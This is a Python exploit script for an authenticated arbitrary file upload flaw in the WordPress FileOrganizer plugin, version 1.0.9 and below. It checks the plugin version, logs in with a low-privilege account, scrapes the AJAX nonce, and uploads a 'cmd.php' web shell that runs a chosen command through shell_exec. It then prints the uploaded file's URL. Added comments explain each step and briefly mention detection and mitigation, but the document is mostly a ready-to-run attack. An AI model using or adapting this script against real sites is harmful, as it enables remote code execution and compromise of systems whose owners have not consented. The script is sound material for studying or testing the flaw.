import requests
import re
import argparse
from bs4 import BeautifulSoup

# One shared HTTP session for every request in this script, so the cookies
# set by the login step are reused by the later requests.
# NOTE: TLS certificate verification is switched off for the whole session and
# urllib3's InsecureRequestWarning is silenced, so the username/password given
# on the command line are sent over a connection whose peer is never
# authenticated.
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False

# ASCII-art banner printed once at start-up (see print(banner) below); has no
# effect on the requests that follow.
banner = """
'######::'##::::'##:'########:::::::::::'#######::::'#####::::'#######::'##:::::::::::::::::'########::'#######:::'#######::'########:
'##... ##: ##:::: ##: ##.....:::::::::::'##.... ##::'##.. ##::'##.... ##: ##:::'##::::::::::: ##..  ##:'##.... ##:'##.... ##: ##.....::
 ##:::..:: ##:::: ##: ##::::::::::::::::..::::: ##:'##:::: ##:..::::: ##: ##::: ##:::::::::::..:: ##::: ##:::: ##: ##:::: ##: ##:::::::
 ##::::::: ##:::: ##: ######:::'#######::'#######:: ##:::: ##::'#######:: ##::: ##::'#######:::: ##::::: ########:: #######:: #######::
 ##:::::::. ##:: ##:: ##...::::........:'##:::::::: ##:::: ##:'##:::::::: #########:........::: ##::::::...... ##:'##.... ##:...... ##:
 ##::: ##::. ## ##::: ##:::::::::::::::: ##::::::::. ##:: ##:: ##::::::::...... ##::::::::::::: ##:::::'##:::: ##: ##:::: ##:'##::: ##:
. ######::::. ###:::: ########:::::::::: #########::. #####::: #########::::::: ##::::::::::::: ##:::::. #######::. #######::. ######::
:......::::::...:::::........::::::::::By Nxploit Khaled_alenazi....:::::::::::..::::::::::::::..:::::::.......::::.......::::......:::
"""

# Command-line interface. All four values are read once here and used as
# module-level globals by the code below.
parser = argparse.ArgumentParser(description="FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi")
# Base URL of the site; it is concatenated with "/wp-..." paths below, so a
# trailing slash would produce a double slash in every request.
parser.add_argument("--url", required=True, help="Target WordPress site URL")
# Credentials for an existing account on the site (the description above says
# a Subscriber-level account is enough).
parser.add_argument("--username", required=True, help="WordPress Username")
parser.add_argument("--password", required=True, help="WordPress Password")
# Interpolated verbatim into the PHP source that is uploaded further down
# (see the `files` dict); no quoting or validation is applied to it.
parser.add_argument("--cmd", default="ls -la /", help="Command to execute in uploaded file")
args = parser.parse_args()

print(banner)

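def _version_tuple(version: str) -> tuple[int, ...]:
    """Turn a dotted numeric version string ("1.0.9") into a tuple of ints."""
    return tuple(int(part) for part in version.split("."))


def check_version(url, max_vulnerable="1.0.9"):
    """Report whether the plugin's public readme advertises an affected version.

    Fetches ``wp-content/plugins/fileorganizer/readme.txt`` through the
    module-level ``session`` (sending the module-level ``headers``) and reads
    the ``Stable tag:`` line. Only a version-number check is performed; the
    plugin is not probed in any other way.

    Args:
        url: Base URL of the WordPress site. A trailing slash is tolerated.
        max_vulnerable: Highest affected version as a dotted numeric string
            (defaults to the "<= 1.0.9" range named in the CLI description).

    Returns:
        True when a ``Stable tag`` is found and compares, component by
        component, as <= ``max_vulnerable``; False when the readme is missing
        (non-200), the tag is absent, the version is newer, or the request
        itself fails.
    """
    version_url = f"{url.rstrip('/')}/wp-content/plugins/fileorganizer/readme.txt"
    try:
        response = session.get(version_url, headers=headers, verify=False)
    except requests.RequestException as exc:
        # Previously a connection/TLS/timeout error escaped as a traceback even
        # though the failure message below claims to cover "unreachable".
        print(f"[-] Request failed: {exc}")
        print("[-] Target is not vulnerable or unreachable.")
        return False
    if response.status_code == 200:
        version_match = re.search(r'Stable tag:\s*(\d+\.\d+\.\d+)', response.text)
        if version_match:
            version = version_match.group(1)
            # Compare numerically. The original compared strings, so
            # "1.0.10" <= "1.0.9" was True ('1' sorts before '9') and a
            # patched 1.0.10 site was reported as vulnerable.
            if _version_tuple(version) <= _version_tuple(max_vulnerable):
                print(f"[+] Vulnerable version detected: {version}")
                return True
    print("[-] Target is not vulnerable or unreachable.")
    return False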

# Browser-like User-Agent attached to every request. Defined after
# check_version() but before its first call, so the global resolves at run time.
headers: dict[str, str] = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"}

# Stop early unless the readme reports a version in the affected range.
if not check_version(args.url):
    exit()

# Authenticate with the supplied account through the normal wp-login.php form.
# Success is judged only by the presence of a "wordpress_logged_in*" cookie in
# the session jar; the HTTP response itself is not inspected (the `response`
# variable is never read).
login_url = f"{args.url}/wp-login.php"
login_data = {
    "log": args.username,
    "pwd": args.password,
    "rememberme": "forever",
    "wp-submit": "Log In"
}
response = session.post(login_url, data=login_data, headers=headers)

if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
    print("[+] Logged in successfully!")
else:
    print("[-] Failed to log in. Check your credentials.")
    exit()

# Load the plugin's admin page and pull the AJAX nonce out of the inline
# JavaScript with a regex. `soup` is built but never used -- the BeautifulSoup
# import exists only for this dead assignment. The regex is tied to the exact
# variable name "fileorganizer_ajax_nonce"; any change to the plugin's markup
# makes this step fail with the "[-] Failed to extract nonce." message.
admin_url = f"{args.url}/wp-admin/admin.php?page=fileorganizer"
response = session.get(admin_url, headers=headers)
soup = BeautifulSoup(response.text, 'html.parser')
nonce_match = re.search(r'var fileorganizer_ajax_nonce = "(.*?)";', response.text)
if nonce_match:
    nonce = nonce_match.group(1)
    print(f"[+] Extracted nonce: {nonce}")
else:
    print("[-] Failed to extract nonce.")
    exit()

# The upload request. This is the vulnerability itself: a multipart POST to
# admin-ajax.php with action=fileorganizer_file_folder_manager and cmd=upload,
# carrying a part named "cmd.php" whose content is PHP that runs args.cmd via
# shell_exec(). Nothing in the request requires more than the logged-in
# account obtained above.
#
# Detection: a .php (or any server-executable) part in a multipart request to
# admin-ajax.php for this action, or new .php files appearing under
# wp-content, is the observable artifact. Mitigation: run a plugin release
# outside the "<= 1.0.9" range and reject executable file types in uploads.
#
# "reqid", "target" and "mtime[]" are hard-coded opaque values copied from a
# captured request; they are not derived from the target.
exploit_url = f"{args.url}/wp-admin/admin-ajax.php"
files = {
    "upload[]": ("cmd.php", f"<?php\n   echo '<pre>' . shell_exec('{args.cmd}') . '</pre>';\n?>", "application/x-php")
}
data = {
    "reqid": "1950b7157c315a",
    "cmd": "upload",
    "target": "l1_d3AtY29udGVudA",
    "action": "fileorganizer_file_folder_manager",
    "fileorganizer_nonce": nonce,
    "mtime[]": "1738507656"
}
response = session.post(exploit_url, files=files, data=data, headers=headers)

# Dump the raw response (status, headers, body) for the operator, then try to
# read the uploaded file's URL from the JSON body at added[0].url. The "cmd.php"
# substring test is only a cheap pre-check; the broad `except Exception` also
# swallows a non-JSON body or a different JSON layout and reports it as an
# extraction error rather than a failed upload.
print("[+] Server Response:")
print(response.status_code, response.reason)
print(response.headers)
print(response.text)

if "cmd.php" in response.text:
    try:
        json_response = response.json()
        file_url = json_response['added'][0]['url']
        # f-string with no placeholders -- a plain string would do here.
        print(f"[+] File uploaded successfully!")
        print(f"[+] Access file at: {file_url}")
    except Exception as e:
        print("[!] Error extracting file URL from response:", str(e))
else:
    print("[-] Upload failed!")